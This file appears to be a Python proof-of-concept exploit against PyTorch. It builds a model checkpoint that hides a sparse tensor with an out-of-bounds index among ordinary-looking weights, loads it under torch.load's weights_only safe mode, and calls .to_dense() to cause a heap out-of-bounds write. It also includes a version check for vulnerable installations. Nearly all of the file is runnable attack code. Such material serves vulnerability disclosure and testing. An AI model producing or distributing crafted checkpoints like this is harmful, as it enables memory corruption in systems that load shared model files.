File size: 7,263 Bytes
238fd51 | 1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44 45 46 47 48 49 50 51 52 53 54 55 56 57 58 59 60 61 62 63 64 65 66 67 68 69 70 71 72 73 74 75 76 77 78 79 80 81 82 83 84 85 86 87 88 89 90 91 92 93 94 95 96 97 98 99 100 101 102 103 104 105 106 107 108 109 110 111 112 113 114 115 116 117 118 119 120 121 122 123 124 125 126 127 128 129 130 131 132 133 134 135 136 137 138 139 140 141 142 143 144 145 146 147 148 149 150 151 152 153 154 155 156 157 158 159 160 161 162 163 164 165 166 167 168 169 170 171 172 173 174 175 176 177 178 179 180 181 182 183 184 185 | #!/usr/bin/env python3
"""
PoC: Sparse Tensor OOB Memory Corruption via torch.load(weights_only=True)
This PoC demonstrates that a crafted .pt file containing a sparse tensor
with out-of-bounds indices can be loaded with weights_only=True (the default
safe mode) and cause heap memory corruption when the tensor is used.
The root cause is that _validate_loaded_sparse_tensors() skips validation
when check_sparse_tensor_invariants is disabled (the default since PyTorch 2.8.0).
IMPACT: Heap OOB write when .to_dense() is called on the loaded sparse tensor.
AFFECTED: PyTorch >= 2.8.0 with weights_only=True (default since 2.6.0)
Usage:
python poc_sparse_oob.py --create # Creates malicious_model.pt
python poc_sparse_oob.py --load # Loads and triggers the bug
python poc_sparse_oob.py --check # Checks if current PyTorch is vulnerable
"""
import argparse
import sys
import os
def check_vulnerability():
"""Check if the current PyTorch installation is vulnerable."""
try:
import torch
except ImportError:
print("[!] PyTorch is not installed. Install it to test.")
return False
print(f"[*] PyTorch version: {torch.__version__}")
# Check 1: Is check_sparse_tensor_invariants disabled?
invariants_enabled = torch.sparse.check_sparse_tensor_invariants.is_enabled()
print(f"[*] Sparse tensor invariant checks enabled: {invariants_enabled}")
if invariants_enabled:
print("[*] NOT VULNERABLE: Sparse tensor invariant checks are enabled.")
print(" This means _validate_loaded_sparse_tensors() will catch OOB indices.")
return False
# Check 2: Is _rebuild_sparse_tensor in the weights_only allowlist?
from torch._weights_only_unpickler import _get_allowed_globals
allowed = _get_allowed_globals()
rebuild_sparse_key = "torch._utils._rebuild_sparse_tensor"
if rebuild_sparse_key in allowed:
print(f"[*] _rebuild_sparse_tensor IS in the weights_only allowlist")
else:
print(f"[*] _rebuild_sparse_tensor is NOT in the weights_only allowlist")
print(" NOT VULNERABLE via this vector.")
return False
# Check 3: Verify _validate_loaded_sparse_tensors skips validation
from torch._utils import _sparse_tensors_to_validate, _validate_loaded_sparse_tensors
# Add a dummy entry
dummy = torch.sparse_coo_tensor(
torch.tensor([[0]]),
torch.tensor([1.0]),
(10,),
check_invariants=False
)
_sparse_tensors_to_validate.append(dummy)
_validate_loaded_sparse_tensors()
# If the list was cleared without validation, we're vulnerable
if len(_sparse_tensors_to_validate) == 0:
print("[*] _validate_loaded_sparse_tensors() SKIPPED validation (list cleared)")
print("[!] VULNERABLE: Sparse tensors loaded from files are NOT validated!")
return True
else:
print("[*] _validate_loaded_sparse_tensors() performed validation")
return False
def create_malicious_model(output_path="malicious_model.pt"):
"""Create a .pt file containing a sparse tensor with OOB indices."""
import torch
print(f"[*] Creating malicious model file: {output_path}")
# Create a sparse COO tensor with indices that point far outside bounds
# The tensor claims to be size (10,) but has an index at position 999999
# When converted to dense, PyTorch will try to write to index 999999
# in a buffer of size 10, causing heap OOB write.
# Approach 1: Simple 1D case
oob_indices = torch.tensor([[0, 7, 999999]]) # index 999999 is OOB for size 10
values = torch.tensor([1.0, 2.0, 3.0])
size = torch.Size([10])
# Create without validation
with torch.sparse.check_sparse_tensor_invariants(False):
malicious_sparse = torch.sparse_coo_tensor(
oob_indices, values, size, check_invariants=False
)
# Save as a state dict (standard model checkpoint format)
state_dict = {
"weight": torch.randn(10, 10), # Normal tensor (looks legit)
"bias": torch.randn(10), # Normal tensor
"sparse_layer": malicious_sparse, # Malicious sparse tensor
}
torch.save(state_dict, output_path)
print(f"[+] Malicious model saved to {output_path}")
print(f" File size: {os.path.getsize(output_path)} bytes")
print(f"[*] The 'sparse_layer' key contains a sparse tensor with OOB indices")
print(f" Declared size: {size}")
print(f" Max index in indices: {oob_indices.max().item()}")
return output_path
def load_and_trigger(model_path="malicious_model.pt"):
"""Load the malicious model and trigger the OOB memory access."""
import torch
print(f"[*] Loading model from: {model_path}")
print(f"[*] Using weights_only=True (the default safe mode)")
# This should succeed -- weights_only=True allows sparse tensors
state_dict = torch.load(model_path, weights_only=True)
print(f"[+] Model loaded successfully with weights_only=True")
print(f"[*] Keys in state_dict: {list(state_dict.keys())}")
sparse_tensor = state_dict["sparse_layer"]
print(f"[*] Sparse tensor loaded:")
print(f" Layout: {sparse_tensor.layout}")
print(f" Size: {sparse_tensor.size()}")
print(f" Indices shape: {sparse_tensor._indices().shape}")
print(f" Max index: {sparse_tensor._indices().max().item()}")
print(f" Invariant checks enabled: {torch.sparse.check_sparse_tensor_invariants.is_enabled()}")
print()
print("[!] About to call .to_dense() -- this will trigger OOB memory write!")
print("[!] The tensor has index 999999 but size is only 10")
print("[!] This writes to memory offset 999999 * sizeof(float) = ~4MB past buffer end")
print()
# WARNING: This will likely crash or corrupt memory
input("Press Enter to trigger the OOB write (or Ctrl+C to abort)... ")
try:
dense = sparse_tensor.to_dense()
print(f"[!] to_dense() completed (memory may be corrupted)")
print(f" Dense shape: {dense.shape}")
print(f" Dense values: {dense}")
except Exception as e:
print(f"[!] Exception during to_dense(): {type(e).__name__}: {e}")
def main():
parser = argparse.ArgumentParser(
description="PoC: Sparse Tensor OOB via torch.load(weights_only=True)"
)
parser.add_argument("--create", action="store_true",
help="Create the malicious model file")
parser.add_argument("--load", action="store_true",
help="Load the malicious model and trigger the bug")
parser.add_argument("--check", action="store_true",
help="Check if the current PyTorch is vulnerable")
parser.add_argument("--output", default="malicious_model.pt",
help="Output path for the malicious model file")
args = parser.parse_args()
if not any([args.create, args.load, args.check]):
parser.print_help()
return
if args.check:
vulnerable = check_vulnerability()
sys.exit(0 if vulnerable else 1)
if args.create:
create_malicious_model(args.output)
if args.load:
load_and_trigger(args.output)
if __name__ == "__main__":
main()
|